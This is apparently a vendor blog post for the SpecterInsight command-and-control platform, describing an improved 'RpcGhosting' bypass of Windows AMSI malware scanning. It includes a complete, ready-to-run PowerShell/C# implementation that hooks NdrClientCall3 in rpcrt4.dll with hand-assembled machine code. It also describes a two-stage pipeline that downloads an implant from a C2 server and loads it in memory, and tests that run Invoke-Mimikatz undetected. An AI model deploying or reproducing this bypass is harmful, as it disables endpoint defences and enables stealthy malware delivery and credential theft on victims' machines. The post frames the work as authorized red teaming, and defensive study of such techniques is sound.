Improved RpcGhosting

This is a story about what happens when your AMSI bypass breaks your own downloader.

A while back, I was integrating the RpcGhosting AMSI bypass into SpecterInsight and noticed that it intermittently broke several of my PowerShell loader pipeline integration tests. This post describes how I tracked down the cause and changed RpcGhosting so that it no longer breaks every RPC call in the process.

TLDR

The RpcGhosting AMSI bypass patches NdrClientCall3 in rpcrt4.dll to always return RPC_S_SERVER_UNAVAILABLE, causing AMSI’s RPC-based provider to fail open and stop scanning. The problem with the original implementation is that NdrClientCall3 handles all NDR-based RPC calls in the process, not just AMSI’s. Patching it unconditionally breaks Windows crypto, COM activation, certificate chain validation, and anything else that routes RPC through the standard NDR pipeline.

The bug that exposed this was HTTPS downloads silently failing after the bypass ran, with a misleading “The underlying connection was closed: An unexpected error occurred on a receive” error that looked like a network problem but was actually a crypto service RPC call hitting the patched function. The straightforward fixes don’t hold up, and the right solution requires knowing exactly who is calling NdrClientCall3 at the moment the hook fires.

The solution was a selective trampoline hook that inspects the first argument to NdrClientCall3 to determine whether the caller is amsi.dll, and only returns the error code in that case. Everything else routes through to the real function unmodified.

How the Payload Pipeline Works

The specific scenario where this surfaced is a two-stage delivery pipeline. The first stage is a cradle script that runs in PowerShell, downloads the actual payload script from the C2 server over HTTPS, and iex’s it. The downloaded script’s job is to apply the AMSI bypass and then download and reflectively load the implant. So the execution order inside the second stage is:

Apply AMSI bypass
Download implant bytes
Assembly.Load the implant

The bypass runs first by design, since you want AMSI disabled before anything sensitive gets scanned. But with RPC Ghosting, that order creates a problem. The moment the bypass patches NdrClientCall3, the WebClient call in step 2 starts failing with "The underlying connection was closed: An unexpected error occurred on a receive." No implant download, no session.

What NdrClientCall3 Actually Is

NdrClientCall3 is the NDR stub dispatch function for client-side RPC calls. It lives in rpcrt4.dll and it handles argument marshaling and transport for essentially all COM/RPC calls that go through the standard NDR pipeline. AMSI’s provider uses it. So does the Windows crypto stack, COM activation, certificate chain validation, and a long list of other Windows subsystems that WebClient quietly leans on when making an HTTPS request.

When the bypass patches the function to always return 0x6BA (the hex value for RPC_S_SERVER_UNAVAILABLE), it is not selectively breaking AMSI; it is breaking every RPC call in the process. AMSI’s provider gives up and fails open, which is the desired outcome. But the TLS handshake for the HTTPS download also breaks, because somewhere in the certificate validation or key exchange path, Windows is making an RPC call to a crypto service, and that call is now also returning RPC_S_SERVER_UNAVAILABLE.

The error message "An unexpected error occurred on a receive" is the network stack’s way of telling you the TLS connection died under it. It is not an obvious RPC error, which is why this took a moment to understand. The WebClient call looks like a network failure, but the actual cause is deeper: a crypto service RPC call that should have succeeded didn’t.

The Obvious Fixes That Don’t Work

Once I understood the problem, the obvious approach was: patch NdrClientCall3, let AMSI’s initialization fail and cache the failure, restore NdrClientCall3, then proceed with the download.

This doesn’t work cleanly. The difficulty is knowing when the AMSI state has been “committed.” AMSI doesn’t cache the failure of a single scan; the provider tries again on the next request. You’d have to keep the hook active across every scan boundary, which means keeping it active during the download, which gets you back to square one.

The other obvious approach is to reorder the pipeline so the download happens before the bypass. That’s architecturally cleaner, but it means Assembly.Load runs without the bypass active. That is the other half of the problem, since the assembly load is exactly what AMSI’s module-loading scan path is watching for.

What you actually want is a hook that breaks AMSI’s RPC calls and nothing else.

The Differentiator

NdrClientCall3 takes a MIDL_STUBLESS_PROXY_INFO* as its first argument (pProxyInfo, which arrives in RCX under the x64 calling convention). That structure is a static const generated by the MIDL compiler and compiled directly into whichever DLL owns the proxy stub code.

When amsi.dll calls NdrClientCall3, pProxyInfo points into amsi.dll’s own data section, because the proxy stubs for the Windows Defender AMSI provider interface are compiled into amsi.dll. When the TLS/crypto stack calls NdrClientCall3, pProxyInfo points somewhere else entirely, into ncrypt.dll, or crypt32.dll, or wherever those stubs live.

So the first argument tells us, reliably, who is making the call. If pProxyInfo falls within amsi.dll’s loaded memory range, the call came from AMSI. If it doesn’t, the call came from somewhere else and should be let through.

The Selective Hook

The implementation uses two memory allocations instead of one.

The first is a trampoline, a buffer containing the original 12 bytes stolen from NdrClientCall3’s function prologue, followed by an indirect jump back to NdrClientCall3+12:

; offset +0: 12 stolen bytes (NdrClientCall3's original prologue)
; offset +12:
FF 25 00 00 00 00    ; jmp [rip+0]
; offset +18:
[8-byte absolute address of NdrClientCall3+12]

When a non-AMSI caller reaches this code, it executes the original prologue bytes and then continues into the real function body as if the patch were never there. The jmp [rip+0] encoding points to the qword at offset +18, which holds the address at which execution resumes inside NdrClientCall3. The standard function prologue doesn’t use RIP-relative addressing, so the stolen bytes relocate cleanly.

The second allocation is the hook stub, the code that NdrClientCall3 now jumps to on entry. It compares RCX against amsi.dll’s base address and the end of its memory range, and branches accordingly:

; +0x00
48 3B 0D 17 00 00 00    ; cmp rcx, [rip+0x17]     ; compare against amsi_start
72 0F                   ; jb call_original
; +0x09
48 3B 0D 16 00 00 00    ; cmp rcx, [rip+0x16]     ; compare against amsi_end
73 06                   ; jae call_original
; +0x12
B8 BA 06 00 00          ; mov eax, 0x6BA           ; RPC_S_SERVER_UNAVAILABLE
C3                      ; ret
; +0x18  call_original:
FF 25 10 00 00 00       ; jmp [rip+0x10]           ; jump to trampoline
; +0x1E  [8 bytes: amsi_start]
; +0x26  [8 bytes: amsi_end]
; +0x2E  [8 bytes: trampoline address]

The amsi_start and amsi_end values are filled in at runtime. Getting them takes one module lookup and two memory reads: the DOS header’s e_lfanew field at offset +0x3C gives the PE header offset, and SizeOfImage sits in the optional header at e_lfanew + 0x50. amsi_start is GetModuleHandle("amsi.dll") and amsi_end is amsi_start + SizeOfImage.
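The header arithmetic is generic PE parsing and can be checked in isolation. The following is a minimal Python sketch, not part of the original implementation: the function names and the synthetic header builder are hypothetical and exist only for illustration. It assumes the image bytes are laid out as they would be in memory, and it treats the resulting range as half-open (start inclusive, end exclusive).

```python
import struct
from typing import Tuple

E_LFANEW_OFFSET = 0x3C       # DOS header field holding the PE header offset
SIZE_OF_IMAGE_OFFSET = 0x50  # from the PE signature: 4 (signature) + 20 (file header) + 56


def read_size_of_image(image: bytes) -> int:
    """Return SizeOfImage from a PE image laid out as it is in memory."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, E_LFANEW_OFFSET)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (size_of_image,) = struct.unpack_from("<I", image, e_lfanew + SIZE_OF_IMAGE_OFFSET)
    return size_of_image


def module_range(base: int, image: bytes) -> Tuple[int, int]:
    """Return the half-open [start, end) address range of a loaded module."""
    return base, base + read_size_of_image(image)


def build_synthetic_header(e_lfanew: int, size_of_image: int) -> bytes:
    """Hypothetical helper: build just enough of a PE header to exercise the parser."""
    buf = bytearray(e_lfanew + SIZE_OF_IMAGE_OFFSET + 4)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, E_LFANEW_OFFSET, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<I", buf, e_lfanew + SIZE_OF_IMAGE_OFFSET, size_of_image)
    return bytes(buf)


header = build_synthetic_header(0x80, 0x21000)
start, end = module_range(0x7FF800000000, header)
print(hex(start), hex(end))
```

The 0x50 offset is the same for PE32 and PE32+ images, because SizeOfImage sits 56 bytes into the optional header in both formats.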

The 12-byte patch on NdrClientCall3 is unchanged from the original technique: mov rax, stub_addr; jmp rax. The only difference is that it now jumps to the hook stub instead of a stub that unconditionally returns the error code.

Putting It Together

In C# (the Add-Type version):

// Get amsi.dll's range
IntPtr amsiBase = Bypass.GetModuleHandle("amsi.dll");
int e_lfanew = Marshal.ReadInt32(IntPtr.Add(amsiBase, 0x3C));
int sizeOfImage = Marshal.ReadInt32(IntPtr.Add(amsiBase, e_lfanew + 0x50));
long amsiStart = amsiBase.ToInt64();
long amsiEnd = amsiStart + sizeOfImage;

// Steal the original 12 bytes for the trampoline
byte[] originalBytes = new byte[12];
Marshal.Copy(func, originalBytes, 0, 12);

// Build the trampoline
IntPtr trampoline = Bypass.VirtualAlloc(IntPtr.Zero, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
Marshal.Copy(originalBytes, 0, trampoline, 12);
Marshal.Copy(new byte[] { 0xFF, 0x25, 0x00, 0x00, 0x00, 0x00 }, 0, IntPtr.Add(trampoline, 12), 6);
Marshal.WriteInt64(IntPtr.Add(trampoline, 18), func.ToInt64() + 12);

// Build the hook stub (54 bytes)
byte[] stubBytes = new byte[] {
    0x48, 0x3B, 0x0D, 0x17, 0x00, 0x00, 0x00,
    0x72, 0x0F,
    0x48, 0x3B, 0x0D, 0x16, 0x00, 0x00, 0x00,
    0x73, 0x06,
    0xB8, 0xBA, 0x06, 0x00, 0x00,
    0xC3,
    0xFF, 0x25, 0x10, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // amsi_start
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // amsi_end
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // trampoline addr
};
IntPtr stub = Bypass.VirtualAlloc(IntPtr.Zero, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
Marshal.Copy(stubBytes, 0, stub, stubBytes.Length);
Marshal.WriteInt64(IntPtr.Add(stub, 0x1E), amsiStart);
Marshal.WriteInt64(IntPtr.Add(stub, 0x26), amsiEnd);
Marshal.WriteInt64(IntPtr.Add(stub, 0x2E), trampoline.ToInt64());

The patch on NdrClientCall3 then points to stub instead of the old buffer that unconditionally returned the error code.

Full Implementation

The complete bypass as a self-contained PowerShell script:

if ($PSVersionTable.PSVersion.Major -gt 2) {
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;

public class RpcGhosting {
    [DllImport("kernel32")] static extern IntPtr GetModuleHandle(string n);
    [DllImport("kernel32")] static extern IntPtr GetProcAddress(IntPtr h, string p);
    [DllImport("kernel32")] static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, uint al, uint p);
    [DllImport("kernel32")] static extern bool VirtualProtect(IntPtr a, UIntPtr s, uint n, out uint o);

    const uint MEM_COMMIT = 0x1000, MEM_RESERVE = 0x2000;
    const uint PAGE_EXECUTE_READWRITE = 0x40, PAGE_READWRITE = 0x04;

    public static void Apply() {
        IntPtr rpcrt4 = GetModuleHandle("rpcrt4.dll");
        IntPtr func = GetProcAddress(rpcrt4, "NdrClientCall3");

        IntPtr amsiBase = GetModuleHandle("amsi.dll");
        int e_lfanew = Marshal.ReadInt32(IntPtr.Add(amsiBase, 0x3C));
        int sizeOfImage = Marshal.ReadInt32(IntPtr.Add(amsiBase, e_lfanew + 0x50));
        long amsiStart = amsiBase.ToInt64();
        long amsiEnd = amsiStart + sizeOfImage;

        byte[] originalBytes = new byte[12];
        Marshal.Copy(func, originalBytes, 0, 12);

        IntPtr trampoline = VirtualAlloc(IntPtr.Zero, new UIntPtr(32),
            MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        Marshal.Copy(originalBytes, 0, trampoline, 12);
        Marshal.Copy(new byte[] { 0xFF, 0x25, 0x00, 0x00, 0x00, 0x00 },
            0, IntPtr.Add(trampoline, 12), 6);
        Marshal.WriteInt64(IntPtr.Add(trampoline, 18), func.ToInt64() + 12);

        byte[] stubBytes = new byte[] {
            0x48, 0x3B, 0x0D, 0x17, 0x00, 0x00, 0x00,              // cmp rcx, [rip+0x17]   ; amsi_start
            0x72, 0x0F,                                              // jb  call_original
            0x48, 0x3B, 0x0D, 0x16, 0x00, 0x00, 0x00,              // cmp rcx, [rip+0x16]   ; amsi_end
            0x73, 0x06,                                              // jae call_original
            0xB8, 0xBA, 0x06, 0x00, 0x00,                          // mov eax, 0x6BA
            0xC3,                                                    // ret
            0xFF, 0x25, 0x10, 0x00, 0x00, 0x00,                    // jmp [rip+0x10]         ; call_original
            0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,        // [amsi_start]
            0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,        // [amsi_end]
            0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,        // [trampoline addr]
        };
        IntPtr stub = VirtualAlloc(IntPtr.Zero, new UIntPtr(64),
            MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        Marshal.Copy(stubBytes, 0, stub, stubBytes.Length);
        Marshal.WriteInt64(IntPtr.Add(stub, 0x1E), amsiStart);
        Marshal.WriteInt64(IntPtr.Add(stub, 0x26), amsiEnd);
        Marshal.WriteInt64(IntPtr.Add(stub, 0x2E), trampoline.ToInt64());

        uint oldProtect;
        VirtualProtect(func, new UIntPtr(12), PAGE_READWRITE, out oldProtect);
        byte[] patch = new byte[12];
        patch[0] = 0x48; patch[1] = 0xB8;
        Array.Copy(BitConverter.GetBytes(stub.ToInt64()), 0, patch, 2, 8);
        patch[10] = 0xFF; patch[11] = 0xE0;
        Marshal.Copy(patch, 0, func, 12);
        VirtualProtect(func, new UIntPtr(12), oldProtect, out oldProtect);
    }
}
'@
    [RpcGhosting]::Apply()
}

Testing It

The concern going in was whether pProxyInfo actually comes from amsi.dll’s address range when AMSI makes the call. The theory says it should, since the proxy stubs for the Windows Defender AMSI interface are compiled into amsi.dll and their static data lives there. But theory and reality don’t always match, especially with Windows internals.

The AmsiBypassEffectivenessTests already had test cases that cover both bypass modes:

AmsiBypassPowerShellCommandsTest runs a probe script that invokes Invoke-Mimikatz via iex and checks that it executes without Defender firing.
AmsiBypassModuleLoadingTest reflectively loads a win_any implant using Assembly.Load on inline Base64 bytes and checks the same.

Both passed with the selective hook in place, confirming that AMSI’s scan calls are still being intercepted correctly, with the pProxyInfo range check working as expected.

For the network side, the unit tests for RpcGhosting and RpcGhostingPowerShell were already calling GetAllNetworkInterfaces() after applying the bypass as a crash/stability check (this was added in a previous round because the original implementation was crashing processes that made network calls after the bypass). Those tests passed too, which means non-AMSI calls to NdrClientCall3 are successfully routing through the trampoline to the original function.

Finally, the full end-to-end test, a randomized five-iteration run of the two-stage download-and-load pipeline where RpcGhosting is now back in the EffectiveAgainstModuleLoading pool, passed cleanly in all iterations.

What This Changes Architecturally

Before this fix, RpcGhosting and RpcGhostingPowerShell were restricted to the EffectiveAgainstPowerShellCommands bypass pool, scenarios where AMSI needs to be disabled for script block execution and no subsequent WebClient download is needed. They couldn’t be used in download-then-load pipelines without breaking the download.

With the selective hook, both techniques are safe for EffectiveAgainstModuleLoading as well, which is the pool that the obfuscated script pipeline draws from. Each generated payload now has four techniques to draw from instead of two, with the RPC transport layer represented in the pool alongside the AmsiScanBuffer and hardware breakpoint approaches.

The trampoline also makes the technique strictly more correct than before. The original implementation was effective but was silently breaking non-AMSI subsystems as a side effect that happened not to matter in the specific scenarios it was being tested in. The selective hook is what the technique should have been from the start, doing exactly what it says it does and nothing more.

SpecterInsight

This selective hook is part of the AMSI bypass pool in SpecterInsight’s obfuscation pipeline. At payload generation time, the pipeline draws from that pool and randomizes technique selection across the payload, so no two generated scripts look the same and the bypass technique rotates. With this fix, RpcGhosting and RpcGhostingPowerShell are fully viable in the EffectiveAgainstModuleLoading pool, meaning download-and-load pipelines get RPC-based AMSI suppression without breaking their own HTTPS transport.

Small details like this are what separate a C2 platform that holds up under real defensive conditions from one that only works in a demo. SpecterInsight is built around that standard. The bypass pool, the obfuscation pipeline, AI-assisted operator tasking, and implant generation are all designed to stay operational as defenders iterate, not just to look good in controlled tests.

If you are running authorized red team operations and need a platform that handles the full stack at this level of rigor, SpecterInsight is worth a serious look.